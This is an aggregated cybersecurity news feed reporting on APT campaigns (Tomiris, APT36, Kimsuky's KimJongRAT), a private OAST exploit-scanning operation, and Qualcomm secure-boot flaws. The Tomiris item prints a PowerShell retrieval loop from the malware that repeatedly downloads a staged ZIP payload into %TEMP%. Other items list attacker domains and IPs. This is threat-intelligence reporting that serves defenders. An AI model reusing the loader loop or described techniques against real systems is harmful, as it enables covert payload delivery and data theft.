• The Tomiris hacker group has resurfaced with a sophisticated campaign targeting foreign ministries and government entities worldwide.

    Beginning in early 2025, this advanced persistent threat (APT) actor shifted its operational strategy to focus on high-value diplomatic infrastructure.

By leveraging a diverse array of programming languages—including Go, Rust, C/C++, and Python—the group has enhanced its ability to bypass traditional security measures while maintaining a low profile and persistent access within compromised networks.

    These attacks typically commence with precision spear-phishing emails containing password-protected archives.

    Attackers frequently disguise malicious executables with double extensions or mislead victims using office document icons, ensuring that the initial infection vector remains obscured.

    The passwords for these archives often follow a predictable pattern, such as “min@2025,” yet this simple obfuscation effectively bypasses automated email scanners.

    Once executed, these payloads initiate a chain of events designed to establish persistence and deploy further malicious tools and backdoors.

    Securelist security analysts noted that Tomiris has increasingly adopted public services like Telegram and Discord for command-and-control (C2) communications.

This tactical evolution allows malicious traffic to blend seamlessly with legitimate network activity, complicating detection for security teams.

    Furthermore, the group has begun deploying open-source post-exploitation frameworks such as Havoc and AdaptixC2, signaling a move toward more modular and resilient attack chains.

    The analysts emphasized that this blend of custom implants and open-source tools makes attribution and mitigation significantly more challenging for defenders.

    The Rust Downloader Mechanism

    A standout component of this campaign is the previously undocumented Tomiris Rust Downloader. Unlike typical data exfiltration tools, this implant performs targeted reconnaissance by scanning specific drives for sensitive file types, including .pdf, .docx, and .xlsx.

    Tomiris Python Discord ReverseShell infection schema (Source - Securelist)

    Interestingly, it does not immediately steal these files; instead, it compiles a list of file paths and transmits this data to a Discord webhook using a multipart POST request.

    The malware employs a “payload_json” field for system information and a “file” field for the path list, ensuring structured data exfiltration.

    Tomiris Rust Downloader infection schema (Source - Securelist)

    The malware is programmed to avoid detection by ignoring specific directories such as “Program Files,” “Windows,” and “AppData.”

    Upon successfully sending the file list, the downloader creates a Visual Basic script (script.vbs) that executes a PowerShell script (script.ps1).

    This script contains a loop that attempts to retrieve a secondary payload—often a ZIP archive containing further executables—every minute.

    # Retrieval loop from script.ps1 as described above; $Url and $dUrl are
    # defined elsewhere in the script and are not shown in this excerpt.
    while($true){
        try{
            # Probe the first URL; any failure throws and falls into the catch block
            $Response = Invoke-WebRequest -Uri $Url -UseBasicParsing
            # Fetch the staged ZIP archive into %TEMP%\1.zip
            iwr -OutFile $env:Temp\1.zip -Uri $dUrl
            # Create the working directory for extraction, then leave the loop
            New-Item -Path $env:TEMP\rfolder -ItemType Directory
            break
        }catch{
            # Retry every 60 seconds until the payload can be retrieved
            Start-Sleep -Seconds 60
        }
    }

    This meticulous approach to reconnaissance and staged delivery highlights the group’s intent to remain undetected while systematically identifying high-value data for future exfiltration and exploitation.


    The post Tomiris Hacker Group Added New Tools and Techniques to Attack Organizations Globally appeared first on Cyber Security News.


  • Qualcomm Technologies, Inc. has issued an urgent security bulletin warning customers about multiple critical vulnerabilities affecting millions of devices worldwide. The most severe flaw threatens the secure boot process, a fundamental security mechanism that protects devices from malicious software during startup. The security update, published today, addresses six high-priority vulnerabilities discovered in Qualcomm’s proprietary software. […]

    The post Qualcomm Alerts Users to Critical Flaws That Compromise the Secure Boot Process appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • Hackers aren’t kicking down the door anymore. They just use the same tools we use every day — code packages, cloud accounts, email, chat, phones, and “trusted” partners — and turn them against us. One bad download can leak your keys. One weak vendor can expose many customers at once. One guest invite, one link on a phone, one bug in a common tool, and suddenly your mail, chats, repos, and


  • The Chinese government’s cyber ecosystem continues to attract significant scrutiny from security researchers worldwide. Following revelations from Intrusion Truth, the i-Soon leaks, tracking of EagleMsgSpy, and exposure of Great Firewall components, a recent analysis has uncovered details about two technology companies allegedly linked to China’s Ministry of State Security (MSS). BIETA and its subsidiary CIII […]

    The post Chinese Front Companies Offering Advanced Steganography Tools for APT Groups appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • A Perth man has been sent to jail for stealing private videos from women and creating a fake Wi-Fi network to trick airline passengers. The 44-year-old’s crimes have shocked the aviation industry and left many victims feeling violated. The Fake Wi-Fi Scheme The trouble started in April 2024 when workers at Qantas spotted something suspicious. […]

    The post Australian Man Jailed for Running Fake Wi-Fi Attacks at Airports and Onboard Flights appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • A new threat has emerged in the cybersecurity landscape as security experts discover a private Out-of-Band Application Security Testing (OAST) service operating on Google Cloud infrastructure.

    This mystery operation stands out from typical exploit scanning activities because it uses custom infrastructure rather than relying on public services. The attackers have been running a focused campaign that targets specific regions with over 200 different vulnerabilities.

    Between October and November 2025, researchers observed roughly 1,400 exploit attempts spanning more than 200 CVEs linked to this operation.

    Unlike most attackers who use public OAST services like oast.fun or interact.sh, this threat actor operates their own private OAST domain at detectors-testing.com.

    This unusual setup caught attention when callbacks started appearing to subdomains of i-sh.detectors-testing.com, a domain not associated with any known OAST provider or popular scanning framework.

    VulnCheck security researchers identified this operation after noticing unusual patterns in their Canary Intelligence traffic.

The campaign combines standard Nuclei scanning templates with custom payloads to expand its reach. What makes this operation particularly interesting is that all observed activity targeted systems deployed in Brazil, suggesting a clear regional focus.

    While the same attacker IP addresses were flagged in Serbia and Turkey through AbuseIPDB reports, VulnCheck’s dataset showed activity concentrated entirely on Brazilian targets.

    The infrastructure behind this operation consists of multiple Google Cloud IP addresses, with six addresses used as exploit scanners and one as the OAST host.

    Using Google Cloud provides practical advantages for attackers since defenders rarely block major US cloud providers, and traffic to Google networks easily blends with normal background communication.

    The operation has been running since at least November 2024, indicating a long-term sustained effort rather than quick opportunistic scans.

    Evidence from an open directory on port 9000 revealed a modified Java class file called TouchFile.class, originally documented in Fastjson 1.2.47 exploitation examples.

    The attackers extended the basic version to accept custom commands and HTTP requests through parameters, showing they actively modify publicly available exploit tools rather than using them unchanged.

    The decompiled code shows that if no parameters are provided, it runs a default command to touch /tmp/success3125, but when cmd or http parameters are present, it executes those commands or makes outbound HTTP requests instead.

    Technical Breakdown of the Exploit Mechanism

    The attackers use a mix of current and outdated Nuclei templates to probe for vulnerabilities. One example is the old grafana-file-read.yaml template, which was removed from the official nuclei-templates repository in early October 2025.

    Finding this older template in active use suggests the attackers either use third-party Nuclei-based scanners like dddd or simply have not updated their scanning tools.

    This combination of old and new templates helps them cast a wider net across different vulnerability types.

    Open directory on port 9000 hosts a Java class file (Source - VulnCheck)

    The exploit payloads follow a standard pattern where successful exploitation triggers the compromised host to make HTTP requests back to the attacker-controlled OAST subdomains.

    For instance, in an attempt against CVE-2025-4428 affecting Ivanti Endpoint Manager Mobile, the payload would force the victim system to contact d4bqsd6e47mo47d93lpgq55d3j111y6em.i-sh.detectors-testing.com.

    This callback mechanism allows attackers to verify which systems are vulnerable without needing direct access, making detection more challenging for defenders.

    The OAST host at 34.136.22.26 consistently presents Interactsh services across ports 80, 443, and 389, confirming its role as a dedicated command and control endpoint for collecting exploit verification callbacks from compromised systems worldwide.


    The post Mystery OAST With Exploit for 200 CVEs Leveraging Google Cloud to Launch Attacks appeared first on Cyber Security News.


  • The AI browser wars are coming to a desktop near you, and you need to start worrying about their security challenges. For the last two decades, whether you used Chrome, Edge, or Firefox, the fundamental paradigm remained the same: a passive window through which a human user viewed and interacted with the internet. That era is over. We are currently witnessing a shift that renders the old


  • Security researchers have confirmed that KimJongRAT, a sophisticated remote access Trojan attributed to the Kimsuky group and believed to be backed by North Korea, is being actively distributed via weaponized .hta files targeting Windows users. The discovery reveals a carefully orchestrated attack chain designed to harvest sensitive credentials and system information from compromised machines. The […]

    The post KimJongRAT Strikes Windows Users via Malicious HTA Files appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • Pakistan-based threat actor APT36, also known as Transparent Tribe, has launched a sophisticated cyber-espionage campaign against Indian government institutions using a newly developed Python-based ELF malware.

    The attack marks a significant escalation in the group’s capabilities, demonstrating their growing technical maturity and adaptability to Linux-based operating systems.

    The campaign centers on spear-phishing emails containing weaponized Linux shortcut files designed to deceive government employees.

    When recipients extract and open these files, the malware silently downloads and executes malicious components in the background while displaying seemingly harmless content to the user.

    This dual-layer approach allows the attackers to maintain stealth while establishing persistent access to critical infrastructure. APT36’s shift toward Linux targeting represents a strategic evolution in their operational doctrine.

    The group has historically focused on Windows-based attacks, but this new campaign reveals their commitment to targeting the BOSS operating system, which is widely deployed across Indian government agencies.

    By adapting their tools to exploit multiple platforms, the threat actors significantly expand their attack surface and operational effectiveness.

    Cyfirma security analysts identified the malware after discovering the weaponized .desktop files being distributed through targeted phishing campaigns.

    Analysis_Proc_Report_Gem.desktop (Source – Cyfirma)

    The researchers noted that the infection chain begins with a deceptive archive file containing the malicious shortcut, which triggers a multi-stage payload delivery process.

    Once executed, the shortcut downloads a decoy PDF document to distract the user while simultaneously fetching and installing the actual ELF malware payload from attacker-controlled servers.

    Malware’s infection mechanism

    The malware’s infection mechanism relies on .desktop files as intermediary delivery vectors, allowing the threat actors to conceal their malicious intent while maintaining flexibility in payload deployment.

Unlike ELF binaries transmitted directly, which security systems detect more easily, .desktop files appear legitimate to Linux users while running embedded commands.

    Source code of the bash file (Source – Cyfirma)

    This approach enables dynamic payload retrieval and significantly reduces forensic evidence.

    Malicious 64-bit ELF (Source – Cyfirma)

    Analysis of the extracted malware reveals a feature-rich remote access tool capable of executing arbitrary shell commands, establishing command-and-control communication, capturing screenshots, and exfiltrating data.

    Shell Commands (Source – Cyfirma)

    The malware uses systemd user-level services to establish persistence, ensuring it continues running across system reboots and user sessions.

    Researchers discovered that the threat actor strategically uses the .desktop file format combined with shell script execution to bypass traditional security controls and maintain undetected presence.

    The campaign infrastructure uses recently registered domains and compromised servers located in multiple countries.

    The malicious domain lionsdenim[.]xyz, registered just 22 days prior, combined with IP address 185.235.137.90 in Frankfurt, facilitates payload delivery.

    Indian government agencies should implement immediate mitigation measures, including enhanced email security, endpoint detection and response solutions, and strict application authorization policies to counter this persistent threat.


    The post APT36 Hackers Used Python-Based ELF Malware to Target Indian Government Entities appeared first on Cyber Security News.


  • Security researchers have discovered that modern attackers are abandoning traditional offensive tools and instead weaponizing legitimate Windows utilities to conduct cyberattacks without triggering security alarms. This shift in tactics, known as “Living Off the Land,” poses a significant challenge for organizations trying to protect their systems. Living off the Land refers to using only the […]

    The post Hackers Shift to ‘Living Off the Land’ Tactics to Evade EDR on Windows Systems appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
